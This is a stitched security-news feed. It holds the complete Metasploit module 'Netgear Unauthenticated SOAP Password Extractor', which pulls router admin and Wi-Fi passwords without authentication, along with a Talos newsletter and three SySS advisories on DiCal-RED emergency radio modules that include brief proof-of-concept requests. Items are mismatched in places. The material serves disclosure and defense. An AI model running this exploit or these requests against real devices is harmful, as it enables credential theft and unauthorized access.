'OPN'    when 2      'WEP'    when 5      'WPA'    when 0, 7      'WPA2'    else      wap['wpa_auth']    end  end  def cipher(wap)    case wap['wpa_cipher']    when 1      ''    when 2      'WEP'    when 3      'TKIP'    when 4      'CCMP'    else      wap['wpa_cipher']    end  end  def auth(wap)    case wap['wpa_auth']    when 0      'MGT'    when 5, 7      'PSK'    else      ''    end  endend

Chromecast Wifi Enumeration

This Metasploit module exploits an authentication bypass vulnerability in different Netgear devices. It allows you to extract the password for the remote management interface.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize    super(      'Name' => 'Netgear Unauthenticated SOAP Password Extractor',      'Description' => %q{        This module exploits an authentication bypass vulnerability in different Netgear devices.        It allows to extract the password for the remote management interface. This module has been        tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:        NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,        NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),        NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),        NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),        NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),        NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),        NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),        NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),        NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),        NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),        NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)      },      'References' => [        [ 'BID', '72640' ],        [ 'OSVDB', '118316' ],        [ 'URL', 'https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR' ]      ],      'Author' => [        'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery        'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module        'h00die <mike@shorebreaksecurity.com>' # Metasploit enhancements/docs      ],      'License' => MSF_LICENSE,      'DisclosureDate' => 'Feb 11 2015'    )  end  def run    print_status('Trying to access the configuration of the device')    # extract device details    action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo'    print_status('Extracting Firmware version...')    extract_data(action)    # extract credentials    action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'    print_status('Extracting credentials...')    extract_data(action)    # extract wifi info    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'    print_status('Extracting Wifi...')    extract_data(action)    # extract WPA info    action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'    print_status('Extracting WPA Keys...')    extract_data(action)  end  def extract_data(soap_action)    res = send_request_cgi({      'method' => 'POST',      'uri' => '/',      'headers' => {        'SOAPAction' => soap_action      },      'data' => '='    })    return if res.nil?    return if res.code == 404    return if res.headers['Server'].nil?    # unknown if other devices have other Server headers    return if res.headers['Server'] !~ %r{Linux/2.6.15 uhttpd/1.0.0 soap/1.0}    if res.body =~ %r{<NewPassword>(.*)</NewPassword>}      print_status('Credentials found, extracting...')      extract_credentials(res.body)    end    if res.body =~ %r{<ModelName>(.*)</ModelName>}      model_name = ::Regexp.last_match(1)      print_good("Model #{model_name} found")    end    if res.body =~ %r{<Firmwareversion>(.*)</Firmwareversion>}      firmware_version = ::Regexp.last_match(1)      print_good("Firmware version #{firmware_version} found")      # store all details as loot      loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body)      print_good("Device details downloaded to: #{loot}")    end    if res.body =~ %r{<NewSSID>(.*)</NewSSID>}      ssid = ::Regexp.last_match(1)      print_good("Wifi SSID: #{ssid}")    end    if res.body =~ %r{<NewBasicEncryptionModes>(.*)</NewBasicEncryptionModes>}      wifi_encryption = ::Regexp.last_match(1)      print_good("Wifi Encryption: #{wifi_encryption}")    end    if res.body =~ %r{<NewWPAPassphrase>(.*)</NewWPAPassphrase>}      wifi_password = ::Regexp.last_match(1)      print_good("Wifi Password: #{wifi_password}")    end  rescue ::Rex::ConnectionError    vprint_error('Failed to connect to the web server')    return  end  def extract_credentials(body)    body.each_line do |line|      next unless line =~ %r{<NewPassword>(.*)</NewPassword>}      pass = ::Regexp.last_match(1)      print_good("admin / #{pass} credentials found")      connection_details = {        module_fullname: fullname,        private_data: pass,        private_type: :password,        username: 'admin',        status: Metasploit::Model::Login::Status::UNTRIED      }.merge(service_details)      create_credential_and_login(connection_details)    end    # store all details as loot    loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body)    print_good("Account details downloaded to: #{loot}")  endend

Netgear Unauthenticated SOAP Password Extractor

As we head into the final third of 2024, we caught up with Talos' Nick Biasini to ask him about the biggest shifts and trends in the threat landscape so far. Turns out, he has two major areas of concern.

Thursday, August 29, 2024 14:00

Hello Talos followers. I’m back for my annual takeover of the Threat Source newsletter. First, an update on that killer sloth movie I was so excited about in August 2023. “Slotherhouse” debuted with an impressive $137,133 at the box office, with critics hailing its various set pieces such as “death by sleeping bag balcony trap” (read that again) and “a particularly gruesome use of hair straighteners.” 

Onto less grisly fare. In the times when I used to frequent the site formerly known as Twitter, my favorite account to follow was “Sorkinese” – a daily elocution safari with the wit and wisdom of Aaron Sorkin characters (mainly from The West Wing). Before Sorkinese’s well timed final tweet in July last year (“The internet people have gone crazy!”) one piece of Sorkin dialogue that I always enjoyed seeing on the feed was “What kind of day has it been?.” The Wingnuts amongst you will know that Sorkin used this as the title of key episodes in several of his shows. It’s meant to signal the end of something, and a reflection of what’s important.  

As summer is drawing to a close and “sweater weather” begins again in earnest, I wanted to use this opportunity to reflect a little…what kind of summer has it been? 

I live in the UK, so “wet” is the first word that comes to mind. But since I allegedly work in the security industry, and this is allegedly a security newsletter, I’ll steer things in that direction. In a "here's what I made earlier" moment (hello to the small percentage of Brits who will get that reference), this is a video which features Talos’ Head of Outreach Nick Biasini. We asked him to reflect on his two biggest areas of concern/importance in the threat landscape right now: 

One more quick thing – it’s now a week until we launch our new documentary, “The Light We Keep: A Project PowerUp Story.” This video will explore first-hand accounts of the chaos and consequences of electronic warfare, and how we developed a solution to maintain reliable power in the event of GPS jamming on Ukraine's electrical grid.

Keep an eye on our social channels for its release and be sure to join us for the live online launch event which will include a Q & A with myself, Joe Marshall, Matt Watchinski, and Matt Olney. 

Register for the livestream on September 5th 

Watch The Light We Keep trailer 

**The one big thing **

 BlackByte is a ransomware-as-a-service (RaaS) group believed to be an offshoot of the infamous Conti ransomware group. They have continued to leverage tactics, techniques and procedures (TTPs) that have formed the foundation of its tradecraft since its inception, continuously iterating its use of vulnerable drivers to bypass security protections and deploying a self-propagating, wormable ransomware encryptor. In recent investigations, Cisco Talos Incident Response (Talos IR) has also observed BlackByte using techniques that depart from their established tradecraft. Members of the team, in collaboration with Talos Intelligence and Interdiction, wrote a blog detailing their findings. 

** Why do I care? **

 During an investigation of a recent BlackByte attack, Talos IR and Talos threat intelligence personnel noted close similarities between indicators of compromise (IOCs) discovered during the investigation and other events flagged in Talos’ global telemetry. Further investigation of these similarities provided additional insights into BlackByte’s current tradecraft and revealed that the group has been significantly more active than would appear from the number of victims published on its data leak site. 

**So now what? **

 Talos IR has provided a full set of recommendations to help defenders protect against RAAS groups such as BlackByte. Including how to detect lateral movement. You’ll find these recommendations in the blog, alongside the MITRE ATT&CK mapping of new TTPs, and Indicators of Compromise. 

**Top security headlines of the week **

*   Hundreds of open-source large language model (LLM) builder servers and dozens of vector databases are leaking highly sensitive information to the open Web. Dark Reading 
*   A recent Qilin ransomware attack targeted credentials that were stored in Google Chrome browsers on a portion of the impacted network’s endpoints. Researchers said the move is an “unusual tactic, and one that could be a bonus multiplier for the chaos already inherent in ransomware situations.” Decipher 
*   Labor Day warning: Protect your date with these high-tech travel tips. Talos’ Nick Biasini recently gave advice on how to spot travel related phishing emails, and how to be aware of vulnerable Bluetooth connections and WIFI spots. Share with your friends and family! ABC News 

**Can’t get enough Talos? **

Talos’ Kelly Patterson just released a 3-part blog series of her research into the intricacies of fuzzing µC/OS protocol stacks. Kelly hopes her research will encourage more widespread use of fuzzing of RTOS software components.  

Check out the series below: 

*   Part 1: HTTP server fuzzing 
*   Part 2: Handling multiple requests per test case  
*   Part 3: TCP/IP server fuzzing, implementing a TAP driver  

**Upcoming events where you can find Talos **

Live launch of The Light We Keep documentary, followed by Q & A (Sept. 5th) 

Online 

BSides Krakow (Sept. 14)   

Krakow, Poland  

LABScon (Sept. 18 - 21)  

Scottsdale, Arizona 

VB2024 (Oct. 2 - 4) 

Dublin, Ireland 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  

MD5: 7bdbd180c081fa63ca94f9c22c457376 

Typical Filename: c0dwjdi6a.dll 

Claimed Product: N/A  

Detection Name: Trojan.GenericKD.33515991 

**SHA 256**:9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc 

**MD5:** 4813fa6d610e180b097eae0ce636d2aa 

**Typical Filename:** xmrig.exe 

**Claimed Product:** XMRig 

**Detection Name:** Trojan.GenericKD.70491190 

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe

**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a

**Typical Filename:** nYzVlQyRnQmDcXk

**Claimed Product:** N/A

**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0

**MD5:** 8c69830a50fb85d8a794fa46643493b2

**Typical Filename:** AAct.exe

**Claimed Product:** N/A

**Detection Name:** PUA.Win.Dropper.Generic::1201

What kind of summer has it been?

DiCal-RED version 4009 provides a network server on TCP port 2101. This service does not seem to process any input, but it regularly sends data to connected clients. This includes operation messages when they are processed by the device. An unauthenticated attacker can therefore gain information about current emergency situations and possibly also emergency vehicle positions or routes.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-042  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)  
Risk Level:                Medium  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2024-36441  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to missing authentication checks, the device is vulnerable to the  
disclosure of sensitive information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device provides a network server on TCP port 2101. This service does not  
seem to process any input, but it regularly sends data to connected clients.  
This includes operation messages when they are processed by the device.  
An unauthenticated attacker can therefore gain information about current  
emergency situations and possibly also emergency vehicle positions or routes.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

$ telnet <IP or hostname> 2101  
[Wait ...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-042  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-042.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgQACgkQnODkQEKd  
i5ZG5RAAgQx1MolkOvk+4nbY4vXjd6bkqa+9e0v1vw8Yu+9Mmb7AhLqz9sHSpe/Y  
bSGnVJowj57irXIYAjuAjXnczRuRVFgOZY+CS3+8aIi0uJ/xuaJh7OSBY6WKDMG1  
S9voYYQ0QJBWxRBX/e+isTKag+XAAG3rBM9/B8S/kQOMXk+ikId0/l4iLici6MEg  
QxRRVOKBgq55zMePg9s42R+M14r+QtMm/8DV6syleaJfYMj/mAq1YDfqVaJms60j  
N2zb6dhlbnaz0xODV9Pjss3X7VvOgiHXtXTCU2CGlYIupNXAtbr0O5MZPGzrjeES  
CrvTfn2SidvxWIJ8n9ldVdL9vImikOdZ5KWrZsaUIdVaSYumyyKNFuW4dbgsd206  
wXU04AH82azCa9uGybCNQwjuvLLReN9H2/hZS865FIf9JD46qyV7fcSbu70kOmbb  
u8mljYWV5cLUEmURj/K9IgSKueyHlVk8hR+seYP7KgYA3zpegbiuaMabLetPgqOT  
j9eleo1AOeDeNqpVoBAwEA2qZ2N1LI2IfrA3ZTXWIO6qMU/r40551/3wd6TC7Fa4  
rypR9+7J371kSRn/eLYTOOqrnlteFOdcEPQbz3r/5wUWmIuNgcR/ipzPrZKsvaPb  
oXqB3PkjDORrKfXpBtT6oHmv7C0wRhZJgbeIhk7IYyfl8lebLps=  
=zVD2  
-----END PGP SIGNATURE-----

DiCal-RED 4009 Information Disclosure

DiCal-RED version 4009 makes use of unmaintained third party components with their own vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-041  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Use of Unmaintained Third Party Components (CWE-1104)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2016-5195, CVE-2016-7406, CVE-2019-12815 and others  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to the use of unmaintained third-party software components, the device is  
vulnerable to numerous known security issues.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device's operating system is based on several well-known open-source  
products, such as the Linux kernel, the Dropbear SSH server and the  
ProFTPD FTP server.

In particular, it runs the following versions:

 Product      | Version | Released  
 -------------|---------|--------------  
 Linux kernel | 3.14.35 | March 2015  
 Dropbear     | 2013.56 | March 2013  
 ProFTPD      |  1.3.3g | November 2011

There are several publicly known security issues that affect these software  
versions, such as CVE-2016-5195, CVE-2016-7406 or CVE-2019-12815.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

None

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-041  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-041.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgQACgkQnODkQEKd  
i5bc5A//bNGaYSQgB48TQes7HlvC5hsYWgtFZU6xdI+V6SEkeGkMGAPfItRDjgAt  
fUxbP+UZbjkgBZuHk5wJJYFWYEHE7a+PFJW7JC3kwioVqanrxzlST/PCCIyxNFZR  
Jy/bwC0EkE5xsyDrOmMbfBAOicObLChmXw7XuN5ec14VUPNjrBL++iYH2Y694ZnC  
sP+sxD7g2QDxTllHkpIcWVZN0T/hH3RHOS5SM0Kv8SfDln38lOSuPbMkr/V/wmpG  
FWpjgYWjtSLFQwozJWxEbp/X6/nwxTIRM1/kTgjNeBZDa74mIGPdxPLDKXYlytI6  
/Wrj6PjN+UjA6fbxb+LvYdtx/xQ98gPj5k84/qlQ8fNO24bSq3VUOcoATm640TtM  
9MEjr38rF/FPksufef1gj45m9/HgnPSeXyVkf5XZR6ipb9Mc+elpO7f+YivY5wfB  
DOuEiYaCJsQL+7KZrVR2c3+4rVTQOiUOzRT8QUPu0//naHfLDtq0DRAlRJQHzIiY  
2xqJPvs4XcmctsokqvbHGikPROEU36cJSBKdSqrorLmC6EU0fPF4c3EzGVSRkHpT  
LOhIjACUWteOLjh3BJhXAobS1jIwS73HUFO+Vr1RT54lhrmXlWIW8WrexDrdA9mz  
ALGeZDjb5uH8Y4DQ5oWOXVbK8eSFAJc/FRRDMRHsiAMWWozOBik=  
=R39e  
-----END PGP SIGNATURE-----

DiCal-RED 4009 Outdated Third Party Components

DiCal-RED version 4009 is vulnerable to unauthorized log access and other files on the device's file system due to improper authentication checks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-040  
Product:                   DiCal-RED  
Manufacturer:              Swissphone Wireless AG  
Affected Version(s):       Unknown  
Tested Version(s):         4009  
Vulnerability Type:        Improper Authentication (CWE-287)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-16  
Solution Date:             None  
Public Disclosure:         2024-08-20  
CVE Reference:             CVE-2024-36444  
Author of Advisory:        Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.

The manufacturer describes the product as follows (see [1]):

"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."

Due to improper authentication checks, the device is vulnerable to  
unauthorized access to logs and other files on the device's file system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The device allows viewing log files via the administrative web interface.  
This function does not require an authenticated session.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

As other parts of the administrative web interface do require authentication,  
a simple proof of concept is to log in to the web interface and navigate to  
the function to view log files.  
Log file contents are returned by a URL similar to  
http:/192.0.2.1/cgi-bin/fdmcgiwebv2.cgi?action=displayfilel&data={%22FilePath%22:%22%22,%22FileAlias%22:%22FdmDebugPath%22,%22LinesMax%22:0}

Using a local proxy to remove the QSESSIONID cookie from this request shows  
that the content is also returned when not sending any session information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends not running the device in an untrusted network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for DiCal-RED  
    https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-040  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-040.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd  
i5ZgGw/9GlpK9ZCfsFYDOaonfqTm0zPxu1CURL4gT2gnmcWKnvZMnSBVtI2qolR/  
oyp8GMhBkQ5i1msTZXCBFTQfmxAjniNZ4hpg9nxY/9q7uThu8td2A89Ge9+qP7u0  
06Z52kYGhMK+C5Ecoww9pOjNtL233B6300kSxxBh4wspAUw8NdOtnBO9zTiU8zcw  
MPjPsoHNofn6Ah1BRw40vkPTDGoKE9wD17nNJn0lnpgvP03ZLgEErk4gkvK0L1ts  
N33g1R0k2M3vKzhid9FUFE+OEFN4NdkmTUqylGU9uLEhtSZiZ5CT1kAcNp6PUOlA  
EmNqudfLngHVhyfTAVXhbJV8C/I9tCiktPiPD3g4sAP5FwsmnfKXvwULCABV7Y6I  
6szsx1JPojyaYTi0hGKviJjewyEld9p7qLuCDt/Hq6BqkxaZkAN1JuyuqMLQDw8k  
ghIBzdqxCpaoa3r43Cg6mpiNzhe9cRYHDDSQ5wl+5nKI4NDy7xxaQd8psyg5CjCP  
CxgJTHne5zvFhtZP7LFa82R3Yux6x6k2XcxbsgoBaBYXS9Qj+QKLU5HxbZVbVwWS  
c0kZzHWWydiaqSfXl5OZDPZIcOZH3C95kXFY78XMOhndqg9yW7ot3OJ/RR5GfX1X  
jqcbLv9k0XCRr55bH/vcLWoJw9oGxfX25FlH2Sp7VYiaIohd8cM=  
=Iaf1  
-----END PGP SIGNATURE-----

Tag

#wifi